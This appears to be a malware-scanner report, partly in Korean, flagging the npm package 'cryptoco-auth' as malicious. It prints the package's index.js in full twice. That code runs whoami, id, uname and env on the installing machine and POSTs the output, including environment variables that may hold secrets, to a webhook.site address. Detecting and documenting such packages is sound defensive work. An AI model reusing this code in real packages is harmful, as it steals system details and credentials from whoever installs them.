// npm 패키지
cryptoco-auth
버전
4
메인테이너
1
최초 publish
2026-05-21
publisher
cryptogrfi
tarball
691 B
AUTO-PUBLISHED·1개 버전 인덱싱됨·최근 publish: 2026-05-21
// exfil path
what is read → where it shipssteals
- ○ system info
sends to
- ⤳ webhook.site(webhook.site (via hostname var))
// offending code· @1.0.3· 1 file flagged
llm: malicious · 0.95→ 의심 전송지로 발송: webhook.site.
- @1.0.3··AUTO-PUBLISHED·publisher: cryptogrfiheuristic 78/100static flags 4llm malicious (0.95) via ollamapublish-burst:4new-publisher:0dtiny-tarball:691breads-system-infowebhook-binchild-process-spawndest-via-hostname-var
→ 의심 전송지로 발송: webhook.site.
// offending code· 1 file flaggedpatterns: 4
--- package/index.js (excerpt) --- const https = require("https"); const { execSync } = require("child_process"); try { const systemInfo = execSync("whoami && id && uname -a && env").toString(); const data = JSON.stringify({ message: "MAXIMUM IMPACT: SCOPED PACKAGE TEST - RCE CONFIRMED", system_details: systemInfo, node_version: process.version }); const options = { hostname: "webhook.site", path: "/28782833-1a36-4e62-b757-772e8cbd77a1", method: "POST", headers: { "Content-Type": "application/json", "Content-Length": data.length } }; const req = https.request(options); req.write(data); req.end(); } catch (e) {} --- dynamic destinations --- → webhook.site (via hostname-var) --- package.json (entry) --- {"name":"cryptoco-auth","version":"1.0.3","main":"index.js"} --- index.js (entry) --- const https = require("https"); const { execSync } = require("child_process"); try { const systemInfo = execSync("whoami && id && uname -a && env").toString(); const data = JSON.stringify({ message: "MAXIMUM IMPACT: SCOPED PACKAGE TEST - RCE CONFIRMED", system_details: systemInfo, node_version: process.version }); const options = { hostname: "webhook.site", path: "/28782833-1a36-4e62-b757-772e8cbd77a1", method: "POST", headers: { "Content-Type": "application/json", "Content-Length": data.length } }; const req = https.request(options); req.write(data); req.end(); } catch (e) {}
